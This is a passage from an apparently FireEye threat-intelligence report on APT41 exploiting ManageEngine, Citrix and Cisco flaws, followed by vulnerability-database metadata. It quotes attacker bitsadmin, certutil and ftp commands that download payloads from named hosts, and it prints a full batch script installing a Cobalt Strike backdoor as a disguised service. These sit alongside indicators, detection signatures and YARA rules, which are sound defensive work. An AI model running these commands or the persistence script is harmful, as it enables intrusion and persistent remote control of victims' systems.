C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe\n\nProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\\Users\\Public\\install.bat \n \n--- \n \nFigure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation\n\nIn both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).\n\n@echo off\n\nset \"WORK_DIR=C:\\Windows\\System32\"\n\nset \"DLL_NAME=storesyncsvc.dll\"\n\nset \"SERVICE_NAME=StorSyncSvc\"\n\nset \"DISPLAY_NAME=Storage Sync Service\"\n\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly.\"\n\nsc stop %SERVICE_NAME%\n\nsc delete %SERVICE_NAME%\n\nmkdir %WORK_DIR%\n\ncopy \"%~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SERVICE_NAME%\" /f\n\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\"\n\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\n\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPAND_SZ /d \"%WORK_DIR%\\%DLL_NAME%\" /f\n\nnet start \"%SERVICE_NAME%\" \n \n--- \n \nFigure 8: Contents of install.bat\n\nStoresyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.\n\nGET /jquery-3.3.1.min.js HTTP/1.1 \nHost: cdn.bootcss.com \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nReferer: http://cdn.bootcss.com/ \nAccept-Encoding: gzip, deflate \nCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM \nDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko \nConnection: Keep-Alive Cache-Control: no-cache \n \n--- \n \nFigure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request\n\nWithin a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we\u2019ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we\u2019ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.\n\nGET /2.exe HTTP/1.1 \nCache-Control: no-cache \nConnection: Keep-Alive \nPragma: no-cache \nAccept: */* \nUser-Agent: Microsoft-CryptoAPI/6.3 \nHost: 91.208.184[.]78 \n \n--- \n \nFigure 10: Example HTTP request downloading \u20182.exe\u2019 VMProtected Meterpreter downloader via CertUtil\n\ncertutil -urlcache -split -f http://91.208.184[.]78/2.exe \n \n--- \n \nFigure 11: Example CertUtil command to download \u20182.exe\u2019 VMProtected Meterpreter downloader\n\nThe Meterpreter downloader \u2018TzGG\u2019 was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).\n\nGET /TzGG HTTP/1.1 \nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) \nHost: 91.208.184[.]78:443 \nConnection: Keep-Alive \nCache-Control: no-cache \n \n--- \n \nFigure 12: Example HTTP request downloading \u2018TzGG\u2019 shellcode for Cobalt Strike BEACON\n\nThe downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.\n\nManageEngine released a short term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long term fix.\n\n#### Outlook\n\nThis activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41.\n\nIt is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\n\nPreviously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.\n\n#### Indicators\n\nType\n\n| \n\nIndicator(s) \n \n---|--- \n \nCVE-2019-19781 Exploitation (Citrix Application Delivery Control)\n\n| \n\n66.42.98[.]220\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018file /bin/pwd\u2019\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un\u2019\n\n/tmp/bsd\n\n/tmp/un \n \nCisco Router Exploitation\n\n| \n\n66.42.98\\\\.220\n\n\u20181.txt\u2019 (MD5: c0c467c8e9b2046d7053642cc9bdd57d)\n\n\u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc \n \nCVE-2020-10189 (Zoho ManageEngine Desktop Central)\n\n| \n\n66.42.98[.]220\n\n91.208.184[.]78\n\n74.82.201[.]8\n\nexchange.dumb1[.]com\n\ninstall.bat (MD5: 7966c2c546b71e800397a67f942858d0)\n\nstoresyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)\n\nC:\\Windows\\Temp\\storesyncsvc.dll\n\nC:\\Windows\\Temp\\install.bat\n\n2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)\n\nC:\\Users\\\\[redacted]\\install.bat\n\nTzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)\n\nC:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe spawning cmd.exe and/or bitsadmin.exe\n\nCertutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78\n\nPowerShell downloading files with Net.WebClient \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.\n\nPlatform\n\n| \n\nSignature Name \n \n---|--- \n \nEndpoint Security\n\n| \n\nBITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)\n\nCERTUTIL.EXE DOWNLOADER A (UTILITY)\n\nGeneric.mg.5909983db4d9023e\n\nGeneric.mg.3e856162c36b5329\n\nPOWERSHELL DOWNLOADER (METHODOLOGY)\n\nSUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)\n\nSAMWELL (BACKDOOR)\n\nSUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT) \n \nNetwork Security\n\n| \n\nBackdoor.Meterpreter\n\nDTI.Callback\n\nExploit.CitrixNetScaler\n\nTrojan.METASTAGE\n\nExploit.ZohoManageEngine.CVE-2020-10198.Pwner\n\nExploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader \n \nHelix\n\n| \n\nCITRIX ADC [Suspicious Commands] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] \nMALWARE METHODOLOGY [Certutil User-Agent] \nWINDOWS METHODOLOGY [BITSadmin Transfer] \nWINDOWS METHODOLOGY [Certutil Downloader] \n \n#### MITRE ATT&CK Technique Mapping\n\nATT&CK\n\n| \n\nTechniques \n \n---|--- \n \nInitial Access\n\n| \n\nExternal Remote Services (T1133), Exploit Public-Facing Application (T1190) \n \nExecution\n\n| \n\nPowerShell (T1086), Scripting (T1064) \n \nPersistence\n\n| \n\nNew Service (T1050) \n \nPrivilege Escalation\n\n| \n\nExploitation for Privilege Escalation (T1068) \n \nDefense Evasion\n\n| \n\nBITS Jobs (T1197), Process Injection (T1055) \n \nCommand And Control\n\n| \n\nRemote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) \n \n#### Appendix A: Discovery Rules\n\nThe following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.\n\nimport \"pe\"\n\nrule ExportEngine_APT41_Loader_String\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription \"This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll\"\n\nstrings:\n\n$pcre = /loader_[\\x00-\\x7F]{1,}\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_ShortName\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a single character\"\n\nstrings:\n\n$pcre = /[A-Za-z0-9]{1}\\\\.(dll|exe|dat|bin|sys)/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_xArch\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a something like x32.dat\"\n\nstrings:\n\n$pcre = /[\\x00-\\x7F]{1,}x(32|64|86)\\\\.dat\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule RareEquities_LibTomCrypt\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples.\"\n\nstrings:\n\n$a1 = \"LibTomMath\"\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1\n\n}\n\nrule RareEquities_KCP\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability.\"\n\nstrings:\n\n$a01 = \"[RO] %ld bytes\"\n\n$a02 = \"recv sn=%lu\"\n\n$a03 = \"[RI] %d bytes\"\n\n$a04 = \"input ack: sn=%lu rtt=%ld rto=%ld\"\n\n$a05 = \"input psh: sn=%lu ts=%lu\"\n\n$a06 = \"input probe\"\n\n$a07 = \"input wins: %lu\"\n\n$a08 = \"rcv_nxt=%lu\\\\\\n\"\n\n$a09 = \"snd(buf=%d, queue=%d)\\\\\\n\"\n\n$a10 = \"rcv(buf=%d, queue=%d)\\\\\\n\"\n\n$a11 = \"rcvbuf\"\n\ncondition:\n\n(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)\n\n}\n\nrule ConventionEngine_Term_Users\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"09e4e6fa85b802c46bc121fcaecc5666\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Users[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Term_Desktop\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"71cdba3859ca8bd03c1e996a790c04f9\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Desktop[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Anomaly_MultiPDB_Double\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"013f3bde3f1022b6cf3f2e541d19353c\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2\n\n} \n \n---\n", "published": "2020-03-25T00:00:00", "modified": "2020-03-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "reporter": "FireEye", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info", "https://support.citrix.com/article/CTX267679", "https://srcincite.io/pocs/src-2020-0011.py.txt", "https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb", "https://github.com/frohoff/ysoserial", "https://twitter.com/steventseeley/status/1235635108498948096?s=20", "https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html", "https://nvd.nist.gov/vuln/detail/CVE-2020-10189", "https://support.citrix.com/article/CTX267027", "https://nvd.nist.gov/vuln/detail/CVE-2019-1652", "https://nvd.nist.gov/vuln/detail/CVE-2019-1653", "https://srcincite.io/advisories/src-2020-0011/", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject", "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce", "https://www.fireeye.com/resources/report-apt41-double-dragon-a-dual-espionage-and-cyber-crime-operation", "https://www.fireeye.com/resources/game-over-detecting-and-stopping-an-apt41-operation", "https://www.fireeye.com/content/fireeye-www/en_US/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", "https://www.fireeye.com/solutions/managed-solutions/managed-defense"], "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-10189", "CVE-2020-10198"], "immutableFields": [], "lastseen": "2021-10-11T21:15:12", "viewCount": 251, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974", "CONFSERVER-57971", "CONFSERVER-57974"]}, {"type": "attackerkb", "idList": ["AKB:028F0B15-BECA-49C5-9195-C76E72BD1A88", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:75573626-39F0-4E95-928D-7603C6E049EF", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "AKB:D87D8B3A-B6C4-4B59-A2EF-577C30171961"]}, {"type": "avleonov", "idList": ["AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "canvas", "idList": ["CONFLUENCE_MACRO_LFI", "NETSCALER_TRAVERSAL_RCE"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0073", "CPAI-2019-0076", "CPAI-2019-0506", "CPAI-2019-1653", "CPAI-2020-0118"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisco", "idList": ["CISCO-SA-20190123-RV-INFO", "CISCO-SA-20190123-RV-INJECT"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-10189", "CVE-2020-13896"]}, {"type": "dsquare", "idList": ["E-686"]}, {"type": "exploitdb", "idList": ["EDB-ID:46243", "EDB-ID:46262", "EDB-ID:46655", "EDB-ID:46731", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:49465"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:151CC13EACB74ED26DB94EB794D08ABD", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:2EB81502D633A85397D825E99A410AAC", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "githubexploit", "idList": ["0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "6787DC40-24C2-5626-B213-399038EFB0E9", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "721C46F4-C390-5D23-B358-3D4B22959428", "78155987-ACB5-51CD-99EB-FF372456D94D", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD"]}, {"type": "hackerone", "idList": ["H1:518637", "H1:536130", "H1:541858", "H1:713900"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-CISCO_RV32X_RCE-", "MSF:EXPLOIT-MULTI-HTTP-CONFLUENCE_WIDGET_CONNECTOR-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["700566.PRM", "700567.PRM", "700661.PRM", "701262.PRM", "CISCO-SA-20190123-RV-INFO_DIRECT.NASL", "CISCO-SA-20190123-RV-INJECT.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CONFLUENCE_6_6_12.NASL", "CONFLUENCE_CVE-2019-3396.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "WEB_APPLICATION_SCANNING_98613", "WEB_APPLICATION_SCANNING_98638", "WEB_APPLICATION_SCANNING_98639", "WEB_APPLICATION_SCANNING_98640", "WEB_APPLICATION_SCANNING_98641"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151311", "PACKETSTORM:151312", "PACKETSTORM:151313", "PACKETSTORM:151374", "PACKETSTORM:152260", "PACKETSTORM:152261", "PACKETSTORM:152262", "PACKETSTORM:152305", "PACKETSTORM:152568", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156730", "PACKETSTORM:161065"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:9C375DB331E2434EE824100A45629096"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:D839D3F3F73DC023B139A626D8C9CFE4", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F4C5F017FE55E40DF427E75D001F7D91"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F", "THREATPOST:145B6B682222579D2623C124AE9DACD5", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:48D622E76FCC26F28B32364668BB1930", 